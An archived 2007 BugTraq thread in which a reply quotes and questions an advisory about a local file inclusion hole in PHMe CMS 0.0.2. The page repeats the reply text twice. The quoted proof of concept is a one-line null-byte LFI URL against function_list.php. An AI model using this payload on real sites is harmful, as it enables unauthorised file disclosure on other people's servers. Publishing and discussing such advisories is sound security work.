BugTraq
Back to list
|
Post reply
PHMe CMS 0.0.2 local File Include Vulnerabilitiy
Jul 23 2007 02:04PM
h4ck3riran yahoo com
(1 replies)
Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy
Jul 23 2007 04:57PM
BlackHawk (hawkgotyou gmail com)
Hello h4ck3riran,
looks like you need mq=off to make this attack..
and this is quite impossible a tthe time because is defailt on..
Monday, July 23, 2007, 4:04:41 PM, you wrote:
> # Tilte: PHMe CMS 0.0.2 local File Include Vulnerabilitiy
> # <www.Aria-security.Com For English >
> # <www.Aria-Security.net For Persian >
> # < Author: You_You >
> # < Software: PHMe CMS >
> # < Site Script: http://sourceforge.net/projects/phme >
>
> proof Of Concept :
>
> www.example.com/[path]/resources/function_list.php?action=[Local Script]%00
--
Best regards,
BlackHawk mailto:hawkgotyou (at) gmail (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
looks like you need mq=off to make this attack..
and this is quite impossible a tthe time because is defailt on..
Monday, July 23, 2007, 4:04:41 PM, you wrote:
> # Tilte: PHMe CMS 0.0.2 local File Include Vulnerabilitiy
> # <www.Aria-security.Com For English >
> # <www.Aria-Security.net For Persian >
> # < Author: You_You >
> # < Software: PHMe CMS >
> # < Site Script: http://sourceforge.net/projects/phme >
>
> proof Of Concept :
>
> www.example.com/[path]/resources/function_list.php?action=[Local Script]%00
--
Best regards,
BlackHawk mailto:hawkgotyou (at) gmail (dot) com [email concealed]
[ reply ]